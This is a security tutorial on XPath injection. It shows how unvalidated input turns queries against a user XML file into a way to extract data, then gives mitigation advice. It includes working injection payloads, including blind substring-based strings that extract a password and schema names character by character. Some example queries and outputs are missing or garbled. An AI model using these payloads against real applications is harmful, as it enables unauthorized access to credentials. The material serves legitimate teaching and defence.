XPath (XML Path Language) is a language used to query XML documents in order to extract data. XML files are commonly used to store information on the server and particularly configuration settings. There are some small application that would manipulate small portions of data often stored in XML files in order to avoid deploying a full database environment. In this case, the data stored is usually not very sensitive, but it can be more interesting when the application uses XML documents to store configuration data such as user settings. When the user-supplied input is directly used to build an XPath query without being validated, it can be possible to inject commands in the same way you exploit an SQL Injection flaw.
Let's see a basic example on how Xpath works and how an application can navigate within the XML document to retrieve data. Consider an application that stores information about users in an XML file:
<user Id="1" FirstName="Chris" LastName="Travis" BirthDay="1990-12-22">
<user Id="2" FirstName="John" LastName="Rosewood" BirthDay="1977-03-19">
<user Id="3" FirstName="Mark" LastName="Borgui" BirthDay="1997-10-03">
Using XPath you can retrieve any information from within the document (attributes, node text, comments,...). For instance, to retrieve the email addresses of every user you can use the following query:
firstname.lastname@example.org email@example.com firstname.lastname@example.org
To extract the BirthDay attribute value for every user:
1990-12-22 1977-03-19 1997-10-03
Remember that XPath syntax is case sensitive. This means the attribute "BirthDay" is different than the attribute "birthday"
To extract BirthDay attribute value of users with the "user" role:
Injecting into XPath
So now that we understand how XPath works, let's see how an attacker could inject arbitrary command to retrieve information he should not be able to see. Consider a functionality that returns the birthday date of a given login and role. For example, if the user supplies login=jrosewood and role=operator, the application will build the following XPath query:
//users/user[login/text()='jrosewood' and role/text()='operator']/@BirthDay
If the application is concatenating the user-supplied data to the XPath query string without any validation, it is possible to send the following values to manipulate the original query:
role=' or 'a'='a
That will result in the following XPath query:
//users/user[login/text()='' and role/text()='' or 'a'='a']/@BirthDay
1990-12-22 1977-03-19 1997-10-03
The OR Boolean term is always true and the query will return all the BirthDay entries. Well, not very useful at this point, but let's see how we can extract more data.
As in SQL language, XPath has a substring function that can be used to extract a subset of characters from a string. For instance, the following query will test if the first character of John Rosewood's password is 'A':
role=operator' and substring(password/text(),1,1)='A' and 'a'='a
The resulting XPath query is now:
//users/user[login/text()='jrosewood' and role/text()='operator' and substring(password/text(),1,1)='A' and 'a'='a']/@BirthDay
This should not return anything, because the last term of the AND sequence is false (the first character is not 'A'). If we test for the letter 's', this will return his BirthDay date, meaning the first character is 's'. Using this technique we are able to extract the full password by retrieving each character one by one.
role=operator' and substring(password/text(),2,1)='3' and 'a'='a
role=operator' and substring(password/text(),3,1)='c' and 'a'='a
role=operator' and substring(password/text(),4,1)='r' and 'a'='a
Well, but this means you already know the structure of the XML document, right? Not an issue, with XPath it is also possible to retrieve tag and attribute names.
In a situation where no information about the XML document structure is known, XPath can still be used to extract data. For instance, to retrieve the root tag name, the following query can be used:
The name() function returns the name of the current node. As XML documents can only have one root element, one value will be returned. We can now extract the full name the same way we saw before:
role=operator' and substring(name(//*),1,1)='u' and 'a'='a
role=operator' and substring(name(//*),2,1)='s' and 'a'='a
role=operator' and substring(name(//*),3,1)='e' and 'a'='a
To retrieve the attribute value, the following query could be used:
This one needs a bit more of explanation. It first navigates until the first <user> element under <users> and then retrieves
its first attribute. The position() function returns the index position of the
current node (we want the first one). As you may have noticed, there is a handy
way to retrieve attribute by selecting its index position:
@* means returning the first attribute. Let's use this with our attack payload:
role=operator' and substring(name(//users/user[position()=1]/@*),1,1)='I' and 'a'='a
role=operator' and substring(name(//users/user[position()=1]/@*),2,1)='d' and 'a'='a
Other useful functions can also be used:
- count(): returns the number of nodes (useful to
automate the extraction and iterate the position() value without going too far).For example, to retrieve the number of <user>
role=operator' and count(//users/user)=3 and 'a'='a
- string-length(): returns the length of the string
(useful to iterate the extraction of characters with substring()). To retrieve the first attribute name length of the first
role=operator' and string-length(name(//users/user[position()=1]/@*))=2 and 'a'='a
XPath is a standard language, which means it is possible to use the same attack string for any implementation, which differs from SQL language. Also, unlike database objects, it is not possible to restrict the access to parts of the XML document. Once the application is authorized to read an XML file, it can access any data within it.
To protect the application against XPath Injection attacks, every user-supplied input must be validated before being used in an XPath query. Unlike SQL, there is no Parameterized Queries available for XPath. The best way is to use "Exact Match" validation, where inputs are compared to a list of known good values (i.e. states or zip code). If not possible, use a "White List" validation to only accept the known good characters. Basically, only alphanumeric characters should be authorized. At least, the following special characters must be rejected:
/ ( ) , = ' [ ] * : and all whitespace
Remember to always reject the query, sending a message back to the user specifying the correct format. Never try to sanitize or substitute the unwanted characters.